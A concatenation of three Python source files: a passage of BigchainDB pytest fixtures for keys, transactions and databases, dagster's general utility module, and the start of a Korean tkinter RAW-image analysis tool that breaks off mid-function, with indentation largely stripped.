mock_file_config)
@pytest.fixture
def reset_logging_config():
# root_logger_level = getLogger().level
root_logger_level = 'DEBUG'
dictConfig({'version': 1, 'root': {'level': 'NOTSET'}})
yield
getLogger().setLevel(root_logger_level)
@pytest.fixture
def user_sk():
return USER_PRIVATE_KEY
@pytest.fixture
def user_pk():
return USER_PUBLIC_KEY
@pytest.fixture
def user2_sk():
return USER2_SK
@pytest.fixture
def user2_pk():
return USER2_PK
@pytest.fixture
def alice():
from bigchaindb.common.crypto import generate_key_pair
return generate_key_pair()
@pytest.fixture
def alice_privkey(alice):
return alice.private_key
@pytest.fixture
def alice_pubkey(alice):
return alice.public_key
@pytest.fixture
def bob():
from bigchaindb.common.crypto import generate_key_pair
return generate_key_pair()
@pytest.fixture
def bob_privkey(bob):
return bob.private_key
@pytest.fixture
def bob_pubkey(bob):
return bob.public_key
@pytest.fixture
def carol():
from bigchaindb.common.crypto import generate_key_pair
return generate_key_pair()
@pytest.fixture
def carol_privkey(carol):
return carol.private_key
@pytest.fixture
def carol_pubkey(carol):
return carol.public_key
@pytest.fixture
def merlin():
from bigchaindb.common.crypto import generate_key_pair
return generate_key_pair()
@pytest.fixture
def merlin_privkey(merlin):
return merlin.private_key
@pytest.fixture
def merlin_pubkey(merlin):
return merlin.public_key
@pytest.fixture
def b():
from bigchaindb.tendermint import BigchainDB
return BigchainDB()
@pytest.fixture
def tb():
from bigchaindb.tendermint import BigchainDB
return BigchainDB()
@pytest.fixture
def create_tx(b, user_pk):
from bigchaindb.models import Transaction
return Transaction.create([b.me], [([user_pk], 1)], asset={'name': 'xyz'})
@pytest.fixture
def signed_create_tx(b, create_tx):
return create_tx.sign([b.me_private])
@pytest.fixture
def signed_transfer_tx(signed_create_tx, user_pk, user_sk):
from bigchaindb.models import Transaction
inputs = signed_create_tx.to_inputs()
tx = Transaction.transfer(inputs, [([user_pk], 1)], asset_id=signed_create_tx.id)
return tx.sign([user_sk])
@pytest.fixture
def double_spend_tx(signed_create_tx, carol_pubkey, user_sk):
from bigchaindb.models import Transaction
inputs = signed_create_tx.to_inputs()
tx = Transaction.transfer(
inputs, [([carol_pubkey], 1)], asset_id=signed_create_tx.id)
return tx.sign([user_sk])
@pytest.fixture
def structurally_valid_vote():
return {
'node_pubkey': 'c' * 44,
'signature': 'd' * 86,
'vote': {
'voting_for_block': 'a' * 64,
'previous_block': 'b' * 64,
'is_block_valid': False,
'invalid_reason': None,
'timestamp': '1111111111'
}
}
@pytest.fixture
def genesis_block(b):
return b.create_genesis_block()
@pytest.fixture
def inputs(user_pk, b, genesis_block):
from bigchaindb.models import Transaction
# create blocks with transactions for `USER` to spend
prev_block_id = genesis_block.id
for block in range(4):
transactions = [
Transaction.create(
[b.me],
[([user_pk], 1)],
metadata={'msg': random.random()},
).sign([b.me_private])
for _ in range(10)
]
block = b.create_block(transactions)
b.write_block(block)
# vote the blocks valid, so that the inputs are valid
vote = b.vote(block.id, prev_block_id, True)
prev_block_id = block.id
b.write_vote(vote)
@pytest.fixture
def inputs_shared(user_pk, user2_pk, b, genesis_block):
from bigchaindb.models import Transaction
# create blocks with transactions for `USER` to spend
prev_block_id = genesis_block.id
for block in range(4):
transactions = [
Transaction.create(
[b.me],
                [([user_pk, user2_pk], 1)],
metadata={'msg': random.random()},
).sign([b.me_private])
for _ in range(10)
]
block = b.create_block(transactions)
b.write_block(block)
# vote the blocks valid, so that the inputs are valid
vote = b.vote(block.id, prev_block_id, True)
prev_block_id = block.id
b.write_vote(vote)
@pytest.fixture
def dummy_db(request):
from bigchaindb.backend import connect, schema
from bigchaindb.common.exceptions import (DatabaseDoesNotExist,
DatabaseAlreadyExists)
conn = connect()
dbname = request.fixturename
xdist_suffix = getattr(request.config, 'slaveinput', {}).get('slaveid')
if xdist_suffix:
dbname = '{}_{}'.format(dbname, xdist_suffix)
try:
schema.init_database(conn, dbname)
except DatabaseAlreadyExists:
schema.drop_database(conn, dbname)
schema.init_database(conn, dbname)
yield dbname
try:
schema.drop_database(conn, dbname)
except DatabaseDoesNotExist:
pass
@pytest.fixture
def not_yet_created_db(request):
from bigchaindb.backend import connect, schema
from bigchaindb.common.exceptions import DatabaseDoesNotExist
conn = connect()
dbname = request.fixturename
xdist_suffix = getattr(request.config, 'slaveinput', {}).get('slaveid')
if xdist_suffix:
dbname = '{}_{}'.format(dbname, xdist_suffix)
try:
schema.drop_database(conn, dbname)
except DatabaseDoesNotExist:
pass
yield dbname
try:
schema.drop_database(conn, dbname)
except DatabaseDoesNotExist:
pass
@pytest.fixture
def db_config():
from bigchaindb import config
return config['database']
@pytest.fixture
def db_host(db_config):
return db_config['host']
@pytest.fixture
def db_port(db_config):
return db_config['port']
@pytest.fixture
def db_name(db_config):
return db_config['name']
@pytest.fixture
def db_conn():
from bigchaindb.backend import connect
return connect()
@pytest.fixture
def db_context(db_config, db_host, db_port, db_name, db_conn):
DBContext = namedtuple(
'DBContext', ('config', 'host', 'port', 'name', 'conn'))
return DBContext(
config=db_config,
host=db_host,
port=db_port,
name=db_name,
conn=db_conn,
)
@pytest.fixture
def tendermint_host():
return os.getenv('BIGCHAINDB_TENDERMINT_HOST', 'localhost')
@pytest.fixture
def tendermint_port():
return int(os.getenv('BIGCHAINDB_TENDERMINT_PORT', 46657))
@pytest.fixture
def tendermint_ws_url(tendermint_host, tendermint_port):
return 'ws://{}:{}/websocket'.format(tendermint_host, tendermint_port)
@pytest.fixture
def tendermint_context(tendermint_host, tendermint_port, tendermint_ws_url):
TendermintContext = namedtuple(
'TendermintContext', ('host', 'port', 'ws_url'))
return TendermintContext(
host=tendermint_host,
port=tendermint_port,
ws_url=tendermint_ws_url,
)
@pytest.fixture
def mocked_setup_pub_logger(mocker):
return mocker.patch(
'bigchaindb.log.setup.setup_pub_logger', autospec=True, spec_set=True)
@pytest.fixture
def mocked_setup_sub_logger(mocker):
return mocker.patch(
'bigchaindb.log.setup.setup_sub_logger', autospec=True, spec_set=True)
@pytest.fixture(autouse=True)
def _abci_http(request):
if request.keywords.get('abci', None):
request.getfixturevalue('abci_http')
@pytest.fixture
def abci_http(_setup_database, _configure_bigchaindb, abci_server,
tendermint_host, tendermint_port):
import requests
import time
for i in range(300):
try:
uri = 'http://{}:{}/abci_info'.format(tendermint_host, tendermint_port)
requests.get(uri)
return True
except requests.exceptions.RequestException as e:
pass
time.sleep(1)
return False
@pytest.yield_fixture(scope='session')
def event_loop(request):
import asyncio
loop = asyncio.get_event_loop_policy().new_event_loop()
yield loop
loop.close()
@pytest.mark.bdb
@pytest.fixture(scope='session')
def abci_server():
from abci import ABCIServer
from bigchaindb.tendermint.core import App
from bigchaindb.utils import Process
app = ABCIServer(app=App())
abci_proxy = Process(name='ABCI', target=app.run)
yield abci_proxy.start()
abci_proxy.terminate()
@pytest.fixture(scope='session')
def certs_dir():
return os.path.abspath('tests/backend/mongodb-ssl/certs')
@pytest.fixture(scope='session')
def ca_chain_cert(certs_dir):
return os.environ.get(
'BIGCHAINDB_DATABASE_CA_CERT',
os.path.join(certs_dir, 'ca-chain.cert.pem'))
@pytest.fixture(scope='session')
def ssl_crl(certs_dir):
return os.environ.get(
'BIGCHAINDB_DATABASE_CRLFILE',
os.path.join(certs_dir, 'crl.pem'))
@pytest.fixture(scope='session')
def ssl_cert(certs_dir):
return os.environ.get(
'BIGCHAINDB_DATABASE_CERTFILE',
os.path.join(certs_dir, 'bigchaindb.cert.pem'))
@pytest.fixture(scope='session')
def ssl_key(certs_dir):
return os.environ.get(
'BIGCHAINDB_DATABASE_KEYFILE',
os.path.join(certs_dir, 'bigchaindb.key.pem'))
@pytest.fixture
def mdb_ssl_pem_key(certs_dir):
return os.environ.get(
'BIGCHAINDB_MDB_PEM_KEY_TEST',
os.path.join(certs_dir, 'local-mongo.pem'))
@pytest.fixture(scope='session')
def ssl_context(ca_chain_cert, ssl_crl, ssl_cert, ssl_key):
SSLContext = namedtuple('SSLContext', ('ca', 'crl', 'cert', 'key'))
return SSLContext(
ca=ca_chain_cert, crl=ssl_crl, cert=ssl_cert, key=ssl_key)
@pytest.fixture
def wsserver_config():
from bigchaindb import config
return config['wsserver']
@pytest.fixture
def wsserver_scheme(wsserver_config):
return wsserver_config['advertised_scheme']
@pytest.fixture
def wsserver_host(wsserver_config):
return wsserver_config['advertised_host']
@pytest.fixture
def wsserver_port(wsserver_config):
return wsserver_config['advertised_port']
@pytest.fixture
def wsserver_base_url(wsserver_scheme, wsserver_host, wsserver_port):
return '{}://{}:{}'.format(wsserver_scheme, wsserver_host, wsserver_port)
@pytest.fixture
def genesis_tx(b, user_pk):
from bigchaindb.models import Transaction
tx = Transaction.create([b.me], [([user_pk], 1)])
tx.operation = Transaction.GENESIS
genesis_tx = tx.sign([b.me_private])
return genesis_tx
@pytest.fixture
def unspent_output_0():
return {
'amount': 1,
'asset_id': 'e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d',
'condition_uri': 'ni:///sha-256;RmovleG60-7K0CX60jjfUunV3lBpUOkiQOAnBzghm0w?fpt=ed25519-sha-256&cost=131072',
'fulfillment_message': '{"asset":{"data":{"hash":"06e47bcf9084f7ecfd2a2a2ad275444a"}},"id":"e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d","inputs":[{"fulfillment":"pGSAIIQT0Jm6LDlcSs9coJK4Q4W-SNtsO2EtMtQJ04EUjBMJgUAXKIqeaippbF-IClhhZNNaP6EIZ_OgrVQYU4mH6b-Vc3Tg-k6p-rJOlLGUUo_w8C5QgPHNRYFOqUk2f1q0Cs4G","fulfills":null,"owners_before":["9taLkHkaBXeSF8vrhDGFTAmcZuCEPqjQrKadfYGs4gHv"]}],"metadata":null,"operation":"CREATE","outputs":[{"amount":"1","condition":{"details":{"public_key":"6FDGsHrR9RZqNaEm7kBvqtxRkrvuWogBW2Uy7BkWc5Tz","type":"ed25519-sha-256"},"uri":"ni:///sha-256;RmovleG60-7K0CX60jjfUunV3lBpUOkiQOAnBzghm0w?fpt=ed25519-sha-256&cost=131072"},"public_keys":["6FDGsHrR9RZqNaEm7kBvqtxRkrvuWogBW2Uy7BkWc5Tz"]},{"amount":"2","condition":{"details":{"public_key":"AH9D7xgmhyLmVE944zvHvuvYWuj5DfbMBJhnDM4A5FdT","type":"ed25519-sha-256"},"uri":"ni:///sha-256;-HlYmgwwl-vXwE52IaADhvYxaL1TbjqfJ-LGn5a1PFc?fpt=ed25519-sha-256&cost=131072"},"public_keys":["AH9D7xgmhyLmVE944zvHvuvYWuj5DfbMBJhnDM4A5FdT"]},{"amount":"3","condition":{"details":{"public_key":"HpmSVrojHvfCXQbmoAs4v6Aq1oZiZsZDnjr68KiVtPbB","type":"ed25519-sha-256"},"uri":"ni:///sha-256;xfn8pvQkTCPtvR0trpHy2pqkkNTmMBCjWMMOHtk3WO4?fpt=ed25519-sha-256&cost=131072"},"public_keys":["HpmSVrojHvfCXQbmoAs4v6Aq1oZiZsZDnjr68KiVtPbB"]}],"version":"1.0"}', # noqa
'output_index': 0,
'transaction_id': 'e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d'
}
@pytest.fixture
def unspent_output_1():
return {
'amount': 2,
'asset_id': 'e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d',
'condition_uri': 'ni:///sha-256;-HlYmgwwl-vXwE52IaADhvYxaL1TbjqfJ-LGn5a1PFc?fpt=ed25519-sha-256&cost=131072',
'fulfillment_message': '{"asset":{"data":{"hash":"06e47bcf9084f7ecfd2a2a2ad275444a"}},"id":"e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d","inputs":[{"fulfillment":"pGSAIIQT0Jm6LDlcSs9coJK4Q4W-SNtsO2EtMtQJ04EUjBMJgUAXKIqeaippbF-IClhhZNNaP6EIZ_OgrVQYU4mH6b-Vc3Tg-k6p-rJOlLGUUo_w8C5QgPHNRYFOqUk2f1q0Cs4G","fulfills":null,"owners_before":["9taLkHkaBXeSF8vrhDGFTAmcZuCEPqjQrKadfYGs4gHv"]}],"metadata":null,"operation":"CREATE","outputs":[{"amount":"1","condition":{"details":{"public_key":"6FDGsHrR9RZqNaEm7kBvqtxRkrvuWogBW2Uy7BkWc5Tz","type":"ed25519-sha-256"},"uri":"ni:///sha-256;RmovleG60-7K0CX60jjfUunV3lBpUOkiQOAnBzghm0w?fpt=ed25519-sha-256&cost=131072"},"public_keys":["6FDGsHrR9RZqNaEm7kBvqtxRkrvuWogBW2Uy7BkWc5Tz"]},{"amount":"2","condition":{"details":{"public_key":"AH9D7xgmhyLmVE944zvHvuvYWuj5DfbMBJhnDM4A5FdT","type":"ed25519-sha-256"},"uri":"ni:///sha-256;-HlYmgwwl-vXwE52IaADhvYxaL1TbjqfJ-LGn5a1PFc?fpt=ed25519-sha-256&cost=131072"},"public_keys":["AH9D7xgmhyLmVE944zvHvuvYWuj5DfbMBJhnDM4A5FdT"]},{"amount":"3","condition":{"details":{"public_key":"HpmSVrojHvfCXQbmoAs4v6Aq1oZiZsZDnjr68KiVtPbB","type":"ed25519-sha-256"},"uri":"ni:///sha-256;xfn8pvQkTCPtvR0trpHy2pqkkNTmMBCjWMMOHtk3WO4?fpt=ed25519-sha-256&cost=131072"},"public_keys":["HpmSVrojHvfCXQbmoAs4v6Aq1oZiZsZDnjr68KiVtPbB"]}],"version":"1.0"}', # noqa
'output_index': 1,
'transaction_id': 'e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d',
}
@pytest.fixture
def unspent_output_2():
return {
'amount': 3,
'asset_id': 'e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d',
'condition_uri': 'ni:///sha-256;xfn8pvQkTCPtvR0trpHy2pqkkNTmMBCjWMMOHtk3WO4?fpt=ed25519-sha-256&cost=131072',
'fulfillment_message': '{"asset":{"data":{"hash":"06e47bcf9084f7ecfd2a2a2ad275444a"}},"id":"e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d","inputs":[{"fulfillment":"pGSAIIQT0Jm6LDlcSs9coJK4Q4W-SNtsO2EtMtQJ04EUjBMJgUAXKIqeaippbF-IClhhZNNaP6EIZ_OgrVQYU4mH6b-Vc3Tg-k6p-rJOlLGUUo_w8C5QgPHNRYFOqUk2f1q0Cs4G","fulfills":null,"owners_before":["9taLkHkaBXeSF8vrhDGFTAmcZuCEPqjQrKadfYGs4gHv"]}],"metadata":null,"operation":"CREATE","outputs":[{"amount":"1","condition":{"details":{"public_key":"6FDGsHrR9RZqNaEm7kBvqtxRkrvuWogBW2Uy7BkWc5Tz","type":"ed25519-sha-256"},"uri":"ni:///sha-256;RmovleG60-7K0CX60jjfUunV3lBpUOkiQOAnBzghm0w?fpt=ed25519-sha-256&cost=131072"},"public_keys":["6FDGsHrR9RZqNaEm7kBvqtxRkrvuWogBW2Uy7BkWc5Tz"]},{"amount":"2","condition":{"details":{"public_key":"AH9D7xgmhyLmVE944zvHvuvYWuj5DfbMBJhnDM4A5FdT","type":"ed25519-sha-256"},"uri":"ni:///sha-256;-HlYmgwwl-vXwE52IaADhvYxaL1TbjqfJ-LGn5a1PFc?fpt=ed25519-sha-256&cost=131072"},"public_keys":["AH9D7xgmhyLmVE944zvHvuvYWuj5DfbMBJhnDM4A5FdT"]},{"amount":"3","condition":{"details":{"public_key":"HpmSVrojHvfCXQbmoAs4v6Aq1oZiZsZDnjr68KiVtPbB","type":"ed25519-sha-256"},"uri":"ni:///sha-256;xfn8pvQkTCPtvR0trpHy2pqkkNTmMBCjWMMOHtk3WO4?fpt=ed25519-sha-256&cost=131072"},"public_keys":["HpmSVrojHvfCXQbmoAs4v6Aq1oZiZsZDnjr68KiVtPbB"]}],"version":"1.0"}', # noqa
'output_index': 2,
'transaction_id': 'e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d',
}
@pytest.fixture
def unspent_outputs(unspent_output_0, unspent_output_1, unspent_output_2):
return unspent_output_0, unspent_output_1, unspent_output_2
@pytest.fixture
def mongo_client(db_context):
return MongoClient(host=db_context.host, port=db_context.port)
@pytest.fixture
def utxo_collection(db_context, mongo_client):
return mongo_client[db_context.name].utxos
@pytest.fixture
def dummy_unspent_outputs():
return [
{'transaction_id': 'a', 'output_index': 0},
{'transaction_id': 'a', 'output_index': 1},
{'transaction_id': 'b', 'output_index': 0},
]
@pytest.fixture
def utxoset(dummy_unspent_outputs, utxo_collection):
res = utxo_collection.insert_many(copy.deepcopy(dummy_unspent_outputs))
assert res.acknowledged
assert len(res.inserted_ids) == 3
return dummy_unspent_outputs, utxo_collection
|
__init__.py
|
import contextlib
import datetime
import errno
import inspect
import multiprocessing
import os
import re
import signal
import socket
import subprocess
import sys
import tempfile
import threading
from collections import namedtuple
from enum import Enum
from warnings import warn
import six
import yaml
from six.moves import configparser
from dagster import check
from dagster.core.errors import DagsterInvariantViolationError
from dagster.seven import IS_WINDOWS, thread
from dagster.seven.abc import Mapping
from dagster.utils.merger import merge_dicts
from .yaml_utils import load_yaml_from_glob_list, load_yaml_from_globs, load_yaml_from_path
if sys.version_info > (3,):
from pathlib import Path # pylint: disable=import-error
else:
from pathlib2 import Path # pylint: disable=import-error
EPOCH = datetime.datetime.utcfromtimestamp(0)
# 2/3 compatibility
PICKLE_PROTOCOL = 2
DEFAULT_REPOSITORY_YAML_FILENAME = 'repository.yaml'
DEFAULT_WORKSPACE_YAML_FILENAME = 'workspace.yaml'
def file_relative_path(dunderfile, relative_path):
    '''
    This function is useful when one needs to load a file that is
    relative to the position of the current file. (Such as when you
    encode a configuration file path in a source file and want it to be
    runnable from any current working directory.)
    It is meant to be used like the following:
    file_relative_path(__file__, 'path/relative/to/file')
    '''
check.str_param(dunderfile, 'dunderfile')
check.str_param(relative_path, 'relative_path')
return os.path.join(os.path.dirname(dunderfile), relative_path)
def script_relative_path(file_path):
    '''
    Useful for testing with local files. Use a path relative to where the
    test resides and this function will return the absolute path
    of that file. Otherwise it will be relative to the script that
    ran the test.
    Note: this function is very, very expensive (on the order of 1
    millisecond per invocation), so it should only be used in performance
    insensitive contexts. Prefer file_relative_path for anything with
    performance constraints.
    '''
# from http://bit.ly/2snyC6s
check.str_param(file_path, 'file_path')
scriptdir = inspect.stack()[1][1]
return os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(scriptdir)), file_path))
# Adapted from https://github.com/okunishinishi/python-stringcase/blob/master/stringcase.py
def camelcase(string):
check.str_param(string, 'string')
string = re.sub(r'^[\-_\.]', '', str(string))
if not string:
return string
return str(string[0]).upper() + re.sub(
r'[\-_\.\s]([a-z])', lambda matched: str(matched.group(1)).upper(), string[1:]
)
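# A few illustrative conversions (my examples, not from the original module):
#   camelcase('foo_bar')  -> 'FooBar'
#   camelcase('foo-bar')  -> 'FooBar'
#   camelcase('.foo.bar') -> 'FooBar'
# A single leading '-', '_' or '.' is stripped before the first letter is upper-cased.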
def ensure_single_item(ddict):
check.dict_param(ddict, 'ddict')
check.param_invariant(len(ddict) == 1, 'ddict', 'Expected dict with single item')
return list(ddict.items())[0]
@contextlib.contextmanager
def pushd(path):
old_cwd = os.getcwd()
os.chdir(path)
try:
yield path
finally:
os.chdir(old_cwd)
def safe_isfile(path):
'''"Backport of Python 3.8 os.path.isfile behavior.
This is intended to backport https://docs.python.org/dev/whatsnew/3.8.html#os-path. I'm not
sure that there are other ways to provoke this behavior on Unix other than the null byte,
but there are certainly other ways to do it on Windows. Afaict, we won't mask other
ValueErrors, and the behavior in the status quo ante is rough because we risk throwing an
unexpected, uncaught ValueError from very deep in our logic.
'''
try:
return os.path.isfile(path)
except ValueError:
return False
def mkdir_p(path):
try:
os.makedirs(path)
return path
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
class frozendict(dict):
def __readonly__(self, *args, **kwargs):
raise RuntimeError("Cannot modify ReadOnlyDict")
# https://docs.python.org/3/library/pickle.html#object.__reduce__
#
# For a dict, the default behavior for pickle is to iteratively call __setitem__ (see 5th item
# in __reduce__ tuple). Since we want to disable __setitem__ and still inherit dict, we
# override this behavior by defining __reduce__. We return the 3rd item in the tuple, which is
# passed to __setstate__, allowing us to restore the frozendict.
def __reduce__(self):
return (frozendict, (), dict(self))
def __setstate__(self, state):
self.__init__(state)
__setitem__ = __readonly__
__delitem__ = __readonly__
pop = __readonly__
popitem = __readonly__
clear = __readonly__
update = __readonly__
setdefault = __readonly__
del __readonly__
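# Minimal sketch (my addition, not part of the original module) showing why __reduce__
# matters: without it, unpickling would go through __setitem__ and hit the RuntimeError.
def _frozendict_pickle_example():  # pragma: no cover - illustrative only
    import pickle
    fd = frozendict({'a': 1})
    restored = pickle.loads(pickle.dumps(fd))
    assert restored == {'a': 1} and isinstance(restored, frozendict)
    try:
        restored['b'] = 2
    except RuntimeError:
        pass  # still read-only after the round trip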
class frozenlist(list):
def __readonly__(self, *args, **kwargs):
raise RuntimeError("Cannot modify ReadOnlyList")
__setitem__ = __readonly__
__delitem__ = __readonly__
append = __readonly__
clear = __readonly__
extend = __readonly__
insert = __readonly__
pop = __readonly__
remove = __readonly__
reverse = __readonly__
sort = __readonly__
def make_readonly_value(value):
if isinstance(value, list):
return frozenlist(list(map(make_readonly_value, value)))
elif isinstance(value, dict):
return frozendict({key: make_readonly_value(value) for key, value in value.items()})
else:
return value
def get_prop_or_key(elem, key):
if isinstance(elem, Mapping):
return elem.get(key)
else:
return getattr(elem, key)
def list_pull(alist, key):
return list(map(lambda elem: get_prop_or_key(elem, key), alist))
def get_multiprocessing_context():
# Set execution method to spawn, to avoid fork and to have same behavior between platforms.
# Older versions are stuck with whatever is the default on their platform (fork on
# Unix-like and spawn on windows)
#
# https://docs.python.org/3/library/multiprocessing.html#multiprocessing.get_context
if hasattr(multiprocessing, 'get_context'):
return multiprocessing.get_context('spawn')
else:
return multiprocessing
def all_none(kwargs):
for value in kwargs.values():
if value is not None:
return False
return True
def check_script(path, return_code=0):
try:
subprocess.check_output(['python', path])
except subprocess.CalledProcessError as exc:
if return_code != 0:
if exc.returncode == return_code:
return
raise
def check_cli_execute_file_pipeline(path, pipeline_fn_name, env_file=None):
cli_cmd = ['python', '-m', 'dagster', 'pipeline', 'execute', '-f', path, '-a', pipeline_fn_name]
if env_file:
cli_cmd.append('-c')
cli_cmd.append(env_file)
try:
subprocess.check_output(cli_cmd)
except subprocess.CalledProcessError as cpe:
print(cpe)
raise cpe
@contextlib.contextmanager
def safe_tempfile_path():
# This gets a valid temporary file path in the safest possible way, although there is still no
# guarantee that another process will not create a file at this path. The NamedTemporaryFile is
# deleted when the context manager exits and the file object is closed.
#
# This is preferable to using NamedTemporaryFile as a context manager and passing the name
# attribute of the file object around because NamedTemporaryFiles cannot be opened a second time
# if already open on Windows NT or later:
# https://docs.python.org/3.8/library/tempfile.html#tempfile.NamedTemporaryFile
# https://github.com/dagster-io/dagster/issues/1582
with tempfile.NamedTemporaryFile() as fd:
path = fd.name
try:
yield Path(path).as_posix()
finally:
if os.path.exists(path):
os.unlink(path)
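# Usage sketch (illustrative, not from the original module): the context manager yields a
# path string rather than an open file object, so another process can open it freely.
#
#     with safe_tempfile_path() as path:
#         subprocess.check_call(['touch', path])   # hypothetical consumer of the path
#     # on exit the file is unlinked if it was created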
def ensure_gen(thing_or_gen):
if not inspect.isgenerator(thing_or_gen):
def _gen_thing():
yield thing_or_gen
return _gen_thing()
return thing_or_gen
def ensure_dir(file_path):
try:
os.makedirs(file_path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def ensure_file(path):
ensure_dir(os.path.dirname(path))
if not os.path.exists(path):
touch_file(path)
def touch_file(path):
ensure_dir(os.path.dirname(path))
with open(path, 'a'):
os.utime(path, None)
def _kill_on_event(termination_event):
termination_event.wait()
if IS_WINDOWS:
        # This will raise a KeyboardInterrupt in python land - meaning this won't be able to
        # interrupt things like sleep()
thread.interrupt_main()
else:
# If on unix send an os level signal to interrupt any situation we may be stuck in
os.kill(os.getpid(), signal.SIGINT)
# Function to be invoked by daemon thread in processes which seek to be cancellable.
# The motivation for this approach is to be able to exit cleanly on Windows. An alternative
# path is to change how the processes are opened and send CTRL_BREAK signals, which at
# the time of authoring seemed a more costly approach.
#
# Reading for the curious:
# * https://stackoverflow.com/questions/35772001/how-to-handle-the-signal-in-python-on-windows-machine
# * https://stefan.sofa-rockers.org/2013/08/15/handling-sub-process-hierarchies-python-linux-os-x/
def start_termination_thread(termination_event):
check.inst_param(
termination_event, 'termination_event', ttype=type(get_multiprocessing_context().Event())
)
int_thread = threading.Thread(target=_kill_on_event, args=(termination_event,))
int_thread.daemon = True
int_thread.start()
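# Usage sketch (illustrative, not from the original module): the parent process creates the
# event, the child calls start_termination_thread() early in its run, and setting the event
# from the parent interrupts whatever the child is doing.
#
#     ctx = get_multiprocessing_context()
#     termination_event = ctx.Event()
#     # ... pass termination_event to the child process ...
#     # child, at startup:    start_termination_thread(termination_event)
#     # parent, to cancel:    termination_event.set()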
def datetime_as_float(dt):
check.inst_param(dt, 'dt', datetime.datetime)
return float((dt - EPOCH).total_seconds())
# hashable frozen string to string dict
class frozentags(frozendict):
def __init__(self, *args, **kwargs):
super(frozentags, self).__init__(*args, **kwargs)
check.dict_param(self, 'self', key_type=str, value_type=str)
def __hash__(self):
return hash(tuple(sorted(self.items())))
def updated_with(self, new_tags):
check.dict_param(new_tags, 'new_tags', key_type=str, value_type=str)
updated = dict(self)
for key, value in new_tags.items():
updated[key] = value
return frozentags(updated)
class EventGenerationManager(object):
    ''' Utility class that wraps an event generator function that also yields a single instance of
a typed object. All events yielded before the typed object are yielded through the method
`generate_setup_events` and all events yielded after the typed object are yielded through the
method `generate_teardown_events`.
This is used to help replace the context managers used in pipeline initialization with
generators so that we can begin emitting initialization events AND construct a pipeline context
object, while managing explicit setup/teardown.
This does require calling `generate_setup_events` AND `generate_teardown_events` in order to
get the typed object.
'''
def __init__(self, generator, object_cls, require_object=True):
self.generator = check.generator(generator)
self.object_cls = check.type_param(object_cls, 'object_cls')
self.require_object = check.bool_param(require_object, 'require_object')
self.object = None
self.did_setup = False
self.did_teardown = False
def generate_setup_events(self):
self.did_setup = True
try:
while self.object is None:
obj = next(self.generator)
if isinstance(obj, self.object_cls):
self.object = obj
else:
yield obj
except StopIteration:
if self.require_object:
check.inst_param(
self.object,
'self.object',
self.object_cls,
'generator never yielded object of type {}'.format(self.object_cls.__name__),
)
def get_object(self):
if not self.did_setup:
check.failed('Called `get_object` before `generate_setup_events`')
return self.object
def generate_teardown_events(self):
self.did_teardown = True
if self.object:
for event in self.generator:
yield event
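# Usage sketch (illustrative, not from the original module). `pipeline_init_events` is a
# hypothetical generator that yields events and, at some point, a single PipelineContext
# instance; `handle` is a hypothetical event consumer.
#
#     manager = EventGenerationManager(pipeline_init_events(), PipelineContext)
#     for event in manager.generate_setup_events():
#         handle(event)
#     context = manager.get_object()
#     ...  # run the pipeline with `context`
#     for event in manager.generate_teardown_events():
#         handle(event)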
def utc_datetime_from_timestamp(timestamp):
tz = None
if sys.version_info.major >= 3 and sys.version_info.minor >= 2:
from datetime import timezone
tz = timezone.utc
else:
import pytz
tz = pytz.utc
return datetime.datetime.fromtimestamp(timestamp, tz=tz)
def is_enum_value(value):
return False if value is None else issubclass(value.__class__, Enum)
def git_repository_root():
return six.ensure_str(subprocess.check_output(['git', 'rev-parse', '--show-toplevel']).strip())
def segfault():
'''Reliable cross-Python version segfault.
https://bugs.python.org/issue1215#msg143236
'''
import ctypes
ctypes.string_at(0)
def find_free_port():
with contextlib.closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.bind(('', 0))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s.getsockname()[1]
|
tk_raw_image_analy_ver1.0(bera1).py
|
## Image processing and data analysis tool
from tkinter import *; import os.path ;import math
from tkinter.filedialog import *
from tkinter.simpledialog import *
## Function definitions
def loadImage(fname) :
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    fsize = os.path.getsize(fname) # check the file size
    inH = inW = int(math.sqrt(fsize)) # determine the input memory size (important!)
    inImage = []; tmpList = []
    for i in range(inH) : # allocate the input memory (initialized to 0)
        tmpList = []
        for k in range(inW) :
            tmpList.append(0)
        inImage.append(tmpList)
    # load the data from the file into memory
    fp = open(fname, 'rb') # open the file (binary mode)
    for i in range(inH) :
        for k in range(inW) :
            inImage[i][k] = int(ord(fp.read(1)))
    fp.close()
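# Illustrative helper (my addition, not part of the original tool): write a small square
# 8-bit grayscale gradient as a RAW file that loadImage() above can read back.
def _write_sample_raw(fname, size=64):
    with open(fname, 'wb') as fp:
        for i in range(size):
            for k in range(size):
                fp.write(bytes([(i + k) % 256]))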
def openFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
filename = askopenfilename(parent=window,
filetypes=(("RAW파일", "*.raw"), ("모든파일", "*.*")))
    loadImage(filename) # file --> input memory
    equal() # input memory --> output memory
import threading
def display() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    # tear down the existing canvas, if any
    if canvas != None :
        canvas.destroy()
    # prepare the display (fixed size)
    VIEW_X, VIEW_Y = 256, 256
    if VIEW_X >= outW or VIEW_Y >= outH : # image smaller than the view size
        VIEW_X = outW
        VIEW_Y = outH
        step = 1 # number of pixels to skip
    else :
        step = int(outW / VIEW_X)
    window.geometry(str(VIEW_X*2) + 'x' + str(VIEW_Y*2))
    canvas = Canvas(window, width=VIEW_X, height=VIEW_Y)
    paper = PhotoImage(width=VIEW_X, height=VIEW_Y)
    canvas.create_image((VIEW_X/2, VIEW_Y/2), image=paper, state='normal')
    # draw to the screen
